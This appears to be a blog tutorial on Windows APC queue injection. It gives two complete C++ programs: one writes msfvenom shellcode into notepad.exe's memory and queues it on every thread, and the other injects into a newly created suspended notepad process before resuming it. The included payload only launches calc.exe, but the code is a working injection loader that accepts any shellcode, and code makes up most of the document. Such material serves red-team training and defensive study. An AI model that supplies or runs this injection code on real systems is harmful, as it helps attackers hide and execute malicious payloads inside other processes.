Each thread in a program has it’s own Asynchronous Procedure Call (APC) queue. This queue contains a list of functions that are executed when the thread enters an alertable state. “Alertable” essentially means the thread is waiting for something to happen.
Alertable states include the following;
- SleepEx
- SignalObjectAndWait
- MsgWaitForMultipleObjectsEx
- WaitForMultipleObjectsEx
- WaitForSingleObjectEx
Adding functions to the queue can be done using QueueUserAPC. By abusing APC Queues, we can execute arbitrary code in the context of a remote process.
Remote Thread Injection
The below code adds APC functions to threads in a foreign process by;
- Getting the process PID using the function GetProcessIdByName()
- Executing EnumerateRemoteThreads() to determine the remote thread ID’s
- Allocates heap memory in the remote process using VirtualAllocEx(), and writes shellcode to it with WriteProcessMemory.
- Finally, QueueUserAPC is called with a pointer to the allocated shellcode buffer, and the thread handle ID’s.
The method signature for QueueUserAPC is;
DWORD QueueUserAPC(
[in] PAPCFUNC pfnAPC, // pointer to our shellcode
[in] HANDLE hThread, // target thread handle
[in] ULONG_PTR dwData. // A value passed to the APC function. We can ignore this.
);
#include <windows.h>
#include <iostream>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <tlhelp32.h>
#include <tchar.h>
#include <vector>
DWORD GetProcessIdByName(const TCHAR* processName) {
PROCESSENTRY32 processEntry;
HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (hSnapshot == INVALID_HANDLE_VALUE) {
return 0; // Unable to create snapshot
}
processEntry.dwSize = sizeof(PROCESSENTRY32);
if (!Process32First(hSnapshot, &processEntry)) {
CloseHandle(hSnapshot);
return 0; // Unable to get the first process
}
do {
if (_tcsicmp(processEntry.szExeFile, processName) == 0) {
CloseHandle(hSnapshot);
return processEntry.th32ProcessID; // Found the process, return its PID
}
} while (Process32Next(hSnapshot, &processEntry));
CloseHandle(hSnapshot);
return 0; // Process not found
}
// Function to get a list of threads in a remote process
std::vector<DWORD> EnumerateRemoteThreads(DWORD processId) {
std::vector<DWORD> threadIds;
HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0);
if (hSnapshot == INVALID_HANDLE_VALUE) {
std::cerr << "Failed to create snapshot of threads" << std::endl;
return threadIds;
}
THREADENTRY32 te;
te.dwSize = sizeof(THREADENTRY32);
if (!Thread32First(hSnapshot, &te)) {
std::cerr << "Failed to get the first thread" << std::endl;
CloseHandle(hSnapshot);
return threadIds;
}
do {
if (te.th32OwnerProcessID == processId) {
threadIds.push_back(te.th32ThreadID);
}
} while (Thread32Next(hSnapshot, &te));
CloseHandle(hSnapshot);
return threadIds;
}
int main(int argc, char* argv[])
{
//msfvenom -p windows/x64/exec CMD="calc.exe" EXITFUNC=thread -f c
unsigned char shellcode[] =
"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50"
"\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52"
"\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a"
"\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41"
"\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52"
"\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48"
"\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40"
"\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48"
"\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41"
"\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1"
"\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c"
"\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01"
"\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a"
"\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b"
"\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b"
"\x6f\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd"
"\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0"
"\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff"
"\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00";
const TCHAR* processName = _T("notepad.exe");
DWORD process_id = GetProcessIdByName(processName);
//Get a handle to our remote process
HANDLE process_handle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, DWORD(process_id));
// Allocate memory in the remote process
LPVOID buffer = VirtualAllocEx(process_handle, NULL, sizeof(shellcode), (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);
// Write our shellcode to the remote process
WriteProcessMemory(process_handle, buffer, shellcode, sizeof(shellcode), NULL);
std::vector<DWORD> threads = EnumerateRemoteThreads(process_id);
// loop over the available threads and inject our APC functions
for (DWORD thread_id : threads) {
std::cout << "Injecting into thread ID: " << thread_id << std::endl;
HANDLE thread_handle = OpenThread(THREAD_ALL_ACCESS, TRUE, thread_id);
QueueUserAPC((PAPCFUNC)buffer, thread_handle, 0);
}
return 0;
}
The above code will work, but will result in the shellcode being executed a large number of times, since we have no way of determining when the remote threads will be entering alertable state in future. We could inject into a smaller number of threads, but then we have no guarantee the code will trigger in a reasonable timeframe, if at all.
Suspended Thread Execution
To get around the problem of multiple procedures executing at once, we can start a suspended process and attached an APC queue function to it, then resume the function. On resuming the process, our code should execute once.
#include <windows.h>
#include <iostream>
int main()
{
//msfvenom -p windows/x64/exec CMD="calc.exe" EXITFUNC=thread -f c
unsigned char shellcode[] =
"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50"
"\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52"
"\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a"
"\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41"
"\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52"
"\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48"
"\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40"
"\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48"
"\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41"
"\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1"
"\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c"
"\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01"
"\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a"
"\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b"
"\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b"
"\x6f\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd"
"\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0"
"\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff"
"\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00";
LPSTARTUPINFOW startup_info = new STARTUPINFOW();
startup_info->cb = sizeof(STARTUPINFOW);
startup_info->dwFlags = STARTF_USESHOWWINDOW;
PPROCESS_INFORMATION process_info = new PROCESS_INFORMATION();
wchar_t cmd[] = L"notepad.exe\0";
// Create suspended notepad process
CreateProcess( NULL,cmd,NULL, NULL, FALSE,CREATE_NO_WINDOW | CREATE_SUSPENDED, NULL, NULL, startup_info, process_info);
HANDLE process_handle = process_info->hProcess;
HANDLE thread_handle = process_info->hThread;
// Allocate & write memory
LPVOID buffer = VirtualAllocEx(process_handle, NULL, sizeof(shellcode), (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);
WriteProcessMemory(process_handle, buffer, shellcode, sizeof(shellcode), NULL);
//Execute the APC
QueueUserAPC((PAPCFUNC)buffer, thread_handle, 0);
//Continue the thread
ResumeThread(thread_handle);
CloseHandle(thread_handle);
CloseHandle(process_handle);
}
In Conclusion
This post covered the basics of implementing user mode APC to execute shellcode. Interestingly, Kernel APC‘s after often implemented by EDR solutions to injecting hooking code into a monitored application.